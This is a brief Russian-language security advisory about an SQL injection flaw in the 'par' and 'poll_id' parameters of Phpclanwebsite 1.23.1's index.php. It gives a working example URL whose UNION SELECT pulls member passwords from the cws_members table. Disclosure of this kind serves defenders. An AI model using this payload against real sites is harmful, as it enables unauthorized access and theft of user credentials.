Программа: Phpclanwebsite 1.23.1, возможно более ранние версии

Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"par" и "poll_id" сценария "index.php". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://victim/phpclan/index.php?page=forum&func=post&par=
2%20UNION%20SELECT%20null,null,null,null,null,null,password,null
%20FROM%20cws_members%20WHERE%20member_id=3/*



Оставить мнение